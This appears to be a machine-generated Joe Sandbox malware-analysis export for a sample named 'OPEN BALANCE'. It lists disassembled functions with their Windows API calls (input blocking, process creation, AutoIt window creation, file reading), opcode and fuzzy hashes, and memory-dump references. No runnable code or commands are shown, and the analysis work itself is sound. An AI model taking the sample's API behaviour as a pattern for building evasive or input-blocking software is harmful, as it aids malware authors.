Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 9bc568d5ee87426959cbffcef4f64dbeeacde6220e5930968dab383e0eb3ac55
Instruction ID: 23ac284d1c49f6d222af980a46b2360d2da58d6fcb48158f157fadd933a40148
Opcode Fuzzy Hash: 9bc568d5ee87426959cbffcef4f64dbeeacde6220e5930968dab383e0eb3ac55
Instruction Fuzzy Hash: 52F05E30610219EBDB188F15E851AB63BA2FB41362F20865DE9564A2E0C7339995EB60

Function 008BEAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 008BEABD

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 7ba64b08c56c0527d9d9512989394eab3e3a67923e5fd8c5e3f5c7e09b7a0869
Instruction ID: 73590c79b452363b7c249f9fad17654da085db01fe144f7defc23d9622883515
Opcode Fuzzy Hash: 7ba64b08c56c0527d9d9512989394eab3e3a67923e5fd8c5e3f5c7e09b7a0869
Instruction Fuzzy Hash: CEE01A312002189FC710EF69D804E9AF7EDFFA8760F00841AFC49C7391DAB0E8408B91

Function 008D9380 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 008D93C0

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: f5f793e66d12118e17624e49a4a96ac5f6e2e570c89bf97a41bf65439940fb83
Instruction ID: 1f28c749b9c356472c12635cd643a654c8c3d143355d80edcc90d870a1425f5d
Opcode Fuzzy Hash: f5f793e66d12118e17624e49a4a96ac5f6e2e570c89bf97a41bf65439940fb83
Instruction Fuzzy Hash: FDF03931205259BBDB21DF58EC05FC63BA5FB05360F048249FA25672E1CB716960E764

Function 008590A7 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00859BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00859BB2

NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 008590D5

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: e52830733bf0136216f6c8ba95fa83ac66c7e9315d3e639c5719c159d0c9d672
Instruction ID: 717cc06b80e5c6cfed763a4ad7c3fd5a7ac14f1c2df47f0764256e2fe46ba134
Opcode Fuzzy Hash: e52830733bf0136216f6c8ba95fa83ac66c7e9315d3e639c5719c159d0c9d672
Instruction Fuzzy Hash: D8E0EC35600208FBDB15AF94EC11EA43B2AFB49361F108458FA555A2A1CA33A9A2DB55

Function 008D93CB Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00897723,?,?,?,?,?,?), ref: 008D93F6

Part of subcall function 008D8172: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00913018,0091305C), ref: 008D81BF
Part of subcall function 008D8172: CloseHandle.KERNEL32 ref: 008D81D1

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CloseCreateDialogHandleNtdllProc_Process
String ID:
API String ID: 4178364262-0
Opcode ID: d2c6989fdf0561fbb19cf388e8ca624cc223b470bebe5dc2660db943fc2240c2
Instruction ID: ea35b39b1824a03be5a724eb141dc2effd0da81dbaf236099c2633ca122c5b7f
Opcode Fuzzy Hash: d2c6989fdf0561fbb19cf388e8ca624cc223b470bebe5dc2660db943fc2240c2
Instruction Fuzzy Hash: 10E0B631214209EFCB05AF58EC55E963B76FB08351F014256FA15973B2CB32A9A1EF51

Function 00858BA4 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00859BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00859BB2

Part of subcall function 00858BCD: DestroyWindow.USER32(?), ref: 00858C81
Part of subcall function 00858BCD: KillTimer.USER32(00000000,?,?,?,?,00858BBA,00000000,?), ref: 00858D1B

NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?), ref: 00858BC3

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$DestroyDialogKillLongNtdllProc_Timer
String ID:
API String ID: 2797419724-0
Opcode ID: 54d7dfff6815bf6b347601b2c52183da5d86aff84067a5b5802270a8829acddb
Instruction ID: 7e006c712b9975bb8b91c30324cc10592ef81a00aba2baa494a268077215f77e
Opcode Fuzzy Hash: 54d7dfff6815bf6b347601b2c52183da5d86aff84067a5b5802270a8829acddb
Instruction Fuzzy Hash: E6D0127024030CB7EA102B64EC07F993F2DFB007B2F408121FB04791D1CA726490955A

Function 008609D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,008603EE), ref: 008609DA

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 70d501bd3b4a5dbf4bff16bb1155473d0b0bb20eeeb4cd174896bd70ae5ca04e
Instruction ID: 869b64016c35d42cc5192b0ae42ef4cdbff3424e92194e0274f10b5c3d08c8e3
Opcode Fuzzy Hash: 70d501bd3b4a5dbf4bff16bb1155473d0b0bb20eeeb4cd174896bd70ae5ca04e
Instruction Fuzzy Hash:

Function 0086781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0086798B

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 9946e82897407247882bf0a5d72e5869506e09ed1f8a945d986401f12405c208
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: E1518C7160C7499BDB38457C845DBBE27C5FB1234CF1A0639D986C7282CA19DE41D3DA

Function 00876DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef65c210be7ddc406f58ae9f3753c82ad7d2641cb246d12899f791a6bca4741a
Instruction ID: 3f54a7ba48ead5d77875b4eafba49102b58e36c4285960fa8953a39028773d14
Opcode Fuzzy Hash: ef65c210be7ddc406f58ae9f3753c82ad7d2641cb246d12899f791a6bca4741a
Instruction Fuzzy Hash: 3F320122D29F454DD7239634CC62335A64DBFB73C5F15D737E81AB99AAEB29C4838100

Function 0085CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48ec396d124fe28d6dfa4230c577e06a6b276b344e4784eb15a60fcfd0fe0c79
Instruction ID: 1434ca8c372a0312308d0fbd0fc7fceaec852b905149446fc0a49e4b1d8a2121
Opcode Fuzzy Hash: 48ec396d124fe28d6dfa4230c577e06a6b276b344e4784eb15a60fcfd0fe0c79
Instruction Fuzzy Hash: 97322631A042598FDF28EF29C49067D7BE1FB45319F2C816AD85ADB292D332DD85DB40

Function 00847920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eca49446aa2daf610a48a7f81b1d598c3fca91b13f73ccd934bd437db8c275bf
Instruction ID: a97a055baf173612276343ff011470140504569768fb7c11c8cb1dbd658650e4
Opcode Fuzzy Hash: eca49446aa2daf610a48a7f81b1d598c3fca91b13f73ccd934bd437db8c275bf
Instruction Fuzzy Hash: 0722AFB0A0460DDFDF14DFA8C881AAEB7B6FF44314F144529E816EB291EB36AD14CB51

Function 008491C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2819b1b2f9902db5fa7eba2ee09e43130bfb291a8c8bd799dba867fa97ab4674
Instruction ID: 680e1a92837f174214a493b2a52bb54feb7bcd417506a9f025dbb2e5d2be2bea
Opcode Fuzzy Hash: 2819b1b2f9902db5fa7eba2ee09e43130bfb291a8c8bd799dba867fa97ab4674
Instruction Fuzzy Hash: 1702D6B0E00219EFDB14EF58D881AAEB7B5FF54304F118169E856DB291EB31EE14CB91

Function 00861C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 997defb9c28eff44361f11602f74cbd2973be7d0130824955c8f7b099be286f7
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 589156726080E34ADF6D463A857847DFFE1EA523A131F079ED4F2CA1C6EE14D954E620

Function 008619B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 33718bad52d9e4376ea89cb4f9ec68caebc2a0687650c19eeffe9c4283ee7ed3
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 8C9110722090E34ADF6D467A957C43DFEE1AA923B631F079DD4F2CA1C2FE148554A620

Function 00867A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfbf6756e8d017bafcc7ff920b40dae79cdbdd9183f373b6fa03199e9ba86264
Instruction ID: b2e2ef95d0db15e4b848e248d8fb86774154599ca99ae6ade016466e605aa95b
Opcode Fuzzy Hash: cfbf6756e8d017bafcc7ff920b40dae79cdbdd9183f373b6fa03199e9ba86264
Instruction Fuzzy Hash: 72619B3120C71996DE349A6C8CA5BBE3394FF4176CF230A1AE943DB281DA11DE42C3D6

Function 00867CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a59e9997c5f9f640e7924b6a0c34cc59f90716c59551cf302837308d5a21d78
Instruction ID: 9af02686f8b5fb7d300f77e7e9f64449b69f75c8fe064319908756e9044d22ff
Opcode Fuzzy Hash: 3a59e9997c5f9f640e7924b6a0c34cc59f90716c59551cf302837308d5a21d78
Instruction Fuzzy Hash: 70618C7160870996DF388A2C8856BBF2394FF42B0CF120D59E943DB289EA129D4583D6

Function 00861706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 1bb862a8ec9ba398e632943b57321fc4ad882a855dfb1d9a390b2de730955dc5
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 8D8143726090A349DF6D463A857843EFFE1BA923A131F07ADD4F2CB1C6EE249554E620

Function 008B2046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b60dbbd48723df134c77622d234468885475f8773e937147f100536b5060af39
Instruction ID: f6ab05e7c1da338b02c45480c5d1cd15e57ec169573119e3fa363716c55c4b86
Opcode Fuzzy Hash: b60dbbd48723df134c77622d234468885475f8773e937147f100536b5060af39
Instruction Fuzzy Hash: 1F21A8327206158BD728DF79C8126BA73E5F754310F15862EE4A7C37D0DE35A945DB40

Function 008C2ADE Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 008C2B30
DeleteObject.GDI32(00000000), ref: 008C2B43
DestroyWindow.USER32 ref: 008C2B52
GetDesktopWindow.USER32 ref: 008C2B6D
GetWindowRect.USER32(00000000), ref: 008C2B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 008C2CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 008C2CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008C2CF8
GetClientRect.USER32(00000000,?), ref: 008C2D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 008C2D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008C2D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008C2D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008C2D80
GlobalFix.KERNEL32(00000000), ref: 008C2D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008C2D98
GlobalUnWire.KERNEL32(00000000), ref: 008C2DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008C2DA8
GlobalFree.KERNEL32(00000000), ref: 008C2DB3
OleLoadPicture.OLEAUT32(?,00000000,00000000,008DFC38,00000000), ref: 008C2DDB
GlobalFree.KERNEL32(00000000), ref: 008C2DEB
